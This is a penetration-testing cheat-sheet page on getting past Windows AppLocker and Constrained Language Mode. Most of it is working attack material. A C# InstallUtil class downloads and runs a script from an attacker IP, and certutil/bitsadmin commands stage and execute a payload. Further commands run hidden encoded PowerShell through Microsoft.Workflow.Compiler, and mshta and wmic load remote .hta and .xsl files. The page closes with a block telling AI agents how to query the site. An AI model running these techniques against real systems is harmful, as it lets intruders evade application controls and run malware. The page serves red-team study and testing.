# AppLocker Bypass ## AppLocker Bypass * * * * * ### Enumeration Check if there are any AppLocker rules: ``` PS > Get-AppLockerPolicy -Effective -Xml PS > (Get-AppLockerPolicy -Local).RuleCollections PS > Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2 -Recurse ``` ### InstallUtil A combination of AppLocker and CLM bypass: {% code title="BypassCLM.cs" %} ```csharp using System; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Configuration.Install; namespace BypassCLM { class Program { static void Main(string[] args) { Console.WriteLine("These aren't the droids you're looking for."); } } [System.ComponentModel.RunInstaller(true)] public class Sample : System.Configuration.Install.Installer { public override void Uninstall(System.Collections.IDictionary savedState) { string cmd = "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/run.txt')"; Runspace rs = RunspaceFactory.CreateRunspace(); rs.Open(); PowerShell ps = PowerShell.Create(); ps.Runspace = rs; ps.AddScript(cmd); ps.Invoke(); rs.Close(); } } } ``` {% endcode %} {% hint style="info" %} Add a reference for the `System.Management.Automation` assembly before compilation from path: ``` C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 ``` {% endhint %} Upload and execute: ``` Attacker > certutil -encode C:\Users\snovvcrash\Bypass.exe bypass.txt Victim > bitsadmin /transfer job1 http://10.10.13.37/bypass.txt C:\Windows\System32\spool\drivers\color\bypass.txt Victim > certutil -decode C:\Windows\System32\spool\drivers\color\bypass.txt C:\Windows\System32\spool\drivers\color\bypass.exe && del C:\Windows\System32\spool\drivers\color\bypass.txt Victim > C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\System32\spool\drivers\color\bypass.exe ``` ### Microsoft.Workflow\.Compiler.exe ``` PS > C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe info.xml payload.txt ``` {% code title="info.xml" %} ```xml payload.txt false true false false -1 false false false CSharp ``` {% endcode %} {% code title="payload.txt" %} ```csharp using System; using System.Diagnostics; using System.Workflow.Activities; public class Foo : SequentialWorkflowActivity { public Foo() { Process process = new Process(); // Configure the process using the StartInfo properties. process.StartInfo.FileName = "powershell.exe"; process.StartInfo.Arguments = "-WindowStyle Hidden -NoP -NoLogo -exec Bypass -enc "; process.StartInfo.WindowStyle = ProcessWindowStyle.Normal; process.Start(); process.WaitForExit(); } } ``` {% endcode %} ### MSBuild * * ### JScript and MSHTA Full path to `.hta` file is required: ``` Cmd > mshta.exe \users\snovvcrash\cmd.hta Cmd > mshta.exe http://10.10.13.37/cmd.hta ``` {% code title="cmd.hta" %} ``` ``` {% endcode %} ## WMIC ``` Cmd > wmic os get /format:"evil.xsl" Cmd > wmic process get brief /format:"http://10.10.13.37/evil.xsl" ``` {% code title="evil.xsl" %} ``` "); ]]> ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion/applocker-bypass.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.